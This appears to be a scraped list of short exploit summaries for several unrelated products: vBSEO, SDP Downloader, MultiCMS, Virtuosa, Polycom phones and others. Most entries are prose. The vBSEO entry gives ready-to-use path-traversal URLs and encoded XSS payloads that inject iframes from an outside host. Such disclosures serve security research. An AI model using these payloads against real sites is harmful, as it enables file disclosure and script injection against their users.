This exploit is a remote buffer overflow exploit for SDP Downloader. It is a vulnerability in the http_response function of the SDP Downloader application. The exploit sends a malicious HTTP request with a large payload of shellcode to the vulnerable application. The shellcode is then executed, allowing the attacker to gain control of the system.
vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, persistent and non-persistent XSS. Enumeration and confirmation of files can be done by accessing the URL http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt and http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt. Non-persistent XSS can be done by accessing the URL http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E and http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E. Path disclosure can be done by accessing the URL http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbblog.php
vBSEO is prone to persistent XSS due to insufficient sanitization of the titles on external websites vBSEO reads. ModCP & AdminCP has the following features affected: 'Moderate LinkBacks', 'Incoming LinkBacks', 'Outgoing LinkBacks'. After clicking the link, which the attacker has to do, vBSEO will initiate a GET-requested to the target and will then save the linkback if enabled, in either the incoming linkback list or the moderation queue. By default all linkbacks are enabled and this linkback is known as the 'RefBack'. (vBSEO checks the Referrer.)
This exploit allows an attacker to download a file from a vulnerable Caedo HTTPd Server v 0.5.1 ALPHA server. The attacker can specify the file to be downloaded by providing the host, port, path and file name as arguments to the exploit.
MultiCMS is vulnerable to a File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'lng' parameter. This will allow the attacker to read arbitrary files on the server.
A-PDF All to MP3 Converter v.2.0.0 is vulnerable to a SEH overflow vulnerability. By crafting a .wav file and dragging it into the application, a calc.exe process can be spawned. This exploit was discovered by h1ch4m and was later modified by m0nna.
Using the mhtml protocol handler,The file extension is ignored.so the attacker use renname the mhtml file to a *.jpg file,etc. then upload it to the target site. The mhtml-file format is only base on CRLF,so if we can injection CRLF, the site may be attacked. The attacker can also use mhtml-file string injection to bypass X-Frame-Opitions.
Virtuosa Phoenix Edition 5.2 is vulnerable to a buffer overflow attack when importing a malicious ASX file. The vulnerability is caused due to a boundary error when handling the 'Ref' field of the ASX file. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted ASX file with an overly long string in the 'Ref' field.
The vulnerability exists due to insufficient sanitization of user-supplied input in 'sbcat_id' parameter of 'showcats.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.
Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of Service attacks. Sending HTTP GET request with broken Authorization header effect a device restart after ~60 seconds.
Services By CQR